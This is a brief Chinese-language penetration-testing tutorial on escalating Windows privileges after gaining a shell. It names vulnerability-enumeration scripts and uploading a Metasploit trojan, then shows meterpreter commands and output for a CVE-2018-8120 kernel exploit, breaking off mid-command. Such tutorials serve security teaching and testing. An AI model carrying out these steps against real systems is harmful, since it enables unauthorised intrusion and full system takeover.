Windows权限分为四种
user: 普通用户权限
administrator::管理员权限
system 系统权限
TrustedInstaller:Windows中最高权限。有些文件,连System权限也无法修改。
通过getshell拿到权限之后,权限比较低什么事情的干不了,
我们就要提权到administrator或者更高的system权限。
前期可以上传扫描脚本判断出内核漏洞或者系统漏洞,直接利用漏洞提权是最好的方法。
常见的提权信息收集脚本:
vulmap, Wes,WindowsVulnScan
vulmap https://github.com/vulmon/vulmap/
Wes https://github.com/bitsadmin/wesng
WindowsVulnScan https://github.com/chroblert/WindowsVulnScan
,Windows内核溢出漏洞提权(最常见的漏洞)
cve-2018-8120,还有很多漏洞。用cve-2018-8120做演示。
一般拿到权限之后上传msf木马,然后利用msf提权
提权方式如下
meterpreter > getuid 查看当前权限
Server username: TEST\Administrator
meterpreter > background 在后台运行
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > search cve-2018-8120 查找漏洞
msf5 exploit(multi/handler) > use